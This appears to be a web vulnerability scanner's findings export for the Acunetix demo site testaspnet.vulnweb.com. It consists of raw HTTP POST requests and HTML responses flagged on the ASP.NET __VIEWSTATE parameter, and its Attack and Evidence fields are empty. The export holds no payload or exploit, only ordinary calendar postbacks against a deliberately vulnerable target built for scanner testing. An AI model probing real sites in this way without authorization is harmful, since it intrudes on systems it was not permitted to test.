Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8523&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgCAn1ZpS9sIZGRkqWiLH8vXwP1AtVnoI80qyXEaK6E%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKghdS9CgLQp%2BbjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9%2BDiBQKN9%2BDiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2%2F3gkC5p2%2F3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC%2B6SdxQ8C%2B6SdxQ8C%2B6SxmAcC%2B6SxmAcC%2B6SlPwL7pKU%2FAvuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk%2FawJAvuk%2FawJAvukkcMCAvukkcMCAtzL4%2BgFAtzL4%2BgFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv%2FkPAtzLv%2FkPAtzL050HAtzL050HAtzLxzAC3MvHMALcy%2FvXCQLcy%2FvXCQLcy%2B%2FqAgLcy%2B%2FqAgLcy8PTDwLcy8PTDwLcy%2Ff2CALcy%2Ff2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA5R9x0jlRE7p5dVIee3YdYumt%2BmB
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:59:23 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgCAn1ZpS9sIZGRkqWiLH8vXwP1AtVnoI80qyXEaK6E=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKghdS9CgLQp+bjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9+DiBQKN9+DiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2/3gkC5p2/3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC+6SdxQ8C+6SdxQ8C+6SxmAcC+6SxmAcC+6SlPwL7pKU/Avuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk/awJAvuk/awJAvukkcMCAvukkcMCAtzL4+gFAtzL4+gFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv/kPAtzLv/kPAtzL050HAtzL050HAtzLxzAC3MvHMALcy/vXCQLcy/vXCQLcy+/qAgLcy+/qAgLcy8PTDwLcy8PTDwLcy/f2CALcy/f2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA5R9x0jlRE7p5dVIee3YdYumt+mB" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:White" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:Black" title="May 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:Black" title="May 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:Black" title="May 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1139 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,139 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8527&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgCARgCOTtsIZGRkN1KvetM99LiVW9AFOi8ckQFnKgY%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLhu%2FpiAtCn5uMHAqrO1NAFAo332KgDAo332KgDAo33zM8MAo33zM8MAo334OIFAo334OIFAo33lLkNAo33lLkNAo33iNwGAo33iNwGAo33vPMPAo33vPMPAo330JcHAo330JcHAo33xCoCjffEKgKN97iSDQKN97iSDQKN96ypBgKN96ypBgLmnb%2FeCQLmnb%2FeCQLmndPyAgLmndPyAgLmnceJCgLmnceJCgLmnfusAwLmnfusAwLmne%2FDDALmne%2FDDALmnYPmBQLmnYPmBQLmnbe9DQLmnbe9DQLmnavQBgLmnavQBgLmnZ%2B5AwLmnZ%2B5AwLmnbPcDALmnbPcDAL7pJ3FDwL7pJ3FDwL7pLGYBwL7pLGYBwL7pKU%2FAvukpT8C%2B6TZ0wkC%2B6TZ0wkC%2B6TN9gIC%2B6TN9gIC%2B6ThjQoC%2B6ThjQoC%2B6SVoAMC%2B6SVoAMC%2B6SJxwwC%2B6SJxwwC%2B6T9rAkC%2B6T9rAkC%2B6SRwwIC%2B6SRwwIC3Mvj6AUC3Mvj6AUC3MuXjw0C3MuXjw0C3MuLogYC3MuLogYC3Mu%2F%2BQ8C3Mu%2F%2BQ8C3MvTnQcC3MvTnQcC3MvHMALcy8cwAtzL%2B9cJAtzL%2B9cJAtzL7%2BoCAtzL7%2BoCAtzLw9MPAtzLw9MPAtzL9%2FYIAtzL9%2FYIArHSwZ8KArHSwZ8KArHS9bIDArHS9bIDcvFbDGpWDDVcLsSON8C56eSZcU4%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:10:44 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgCARgCOTtsIZGRkN1KvetM99LiVW9AFOi8ckQFnKgY=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLhu/piAtCn5uMHAqrO1NAFAo332KgDAo332KgDAo33zM8MAo33zM8MAo334OIFAo334OIFAo33lLkNAo33lLkNAo33iNwGAo33iNwGAo33vPMPAo33vPMPAo330JcHAo330JcHAo33xCoCjffEKgKN97iSDQKN97iSDQKN96ypBgKN96ypBgLmnb/eCQLmnb/eCQLmndPyAgLmndPyAgLmnceJCgLmnceJCgLmnfusAwLmnfusAwLmne/DDALmne/DDALmnYPmBQLmnYPmBQLmnbe9DQLmnbe9DQLmnavQBgLmnavQBgLmnZ+5AwLmnZ+5AwLmnbPcDALmnbPcDAL7pJ3FDwL7pJ3FDwL7pLGYBwL7pLGYBwL7pKU/AvukpT8C+6TZ0wkC+6TZ0wkC+6TN9gIC+6TN9gIC+6ThjQoC+6ThjQoC+6SVoAMC+6SVoAMC+6SJxwwC+6SJxwwC+6T9rAkC+6T9rAkC+6SRwwIC+6SRwwIC3Mvj6AUC3Mvj6AUC3MuXjw0C3MuXjw0C3MuLogYC3MuLogYC3Mu/+Q8C3Mu/+Q8C3MvTnQcC3MvTnQcC3MvHMALcy8cwAtzL+9cJAtzL+9cJAtzL7+oCAtzL7+oCAtzLw9MPAtzLw9MPAtzL9/YIAtzL9/YIArHSwZ8KArHSwZ8KArHS9bIDArHS9bIDcvFbDGpWDDVcLsSON8C56eSZcU4=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:White" title="May 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:Black" title="May 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:Black" title="May 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1127 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
